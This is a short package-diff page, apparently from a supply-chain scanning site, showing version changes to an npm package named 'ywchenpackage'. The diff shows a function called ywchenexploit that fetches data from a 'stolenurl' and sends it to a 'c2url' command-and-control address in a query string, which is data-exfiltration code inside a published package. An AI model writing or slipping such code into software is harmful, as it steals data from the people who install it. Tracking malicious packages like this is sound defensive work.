ywchenpackage 1.0.1 → 1.0.3
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +3 -5
- package/package.json +1 -1
package/index.js
CHANGED
@@ -1,6 +1,6 @@
|
|
1
1
|
function ywchenexploit() {
|
2
|
-
let stolenurl = document.stolenurl.
|
3
|
-
let c2url = document.c2url.
|
2
|
+
let stolenurl = document.stolenurl.url;
|
3
|
+
let c2url = document.c2url.url;
|
4
4
|
fetch(stolenurl)
|
5
5
|
.then(
|
6
6
|
function(response){
|
@@ -11,6 +11,4 @@ function ywchenexploit() {
|
|
11
11
|
fetch(c2url + "?data=" + JSON.stringify(response[0]));
|
12
12
|
})
|
13
13
|
return "hello NPM"
|
14
|
-
}
|
15
|
-
|
16
|
-
module.exports = ywchenexploit
|
14
|
+
}
|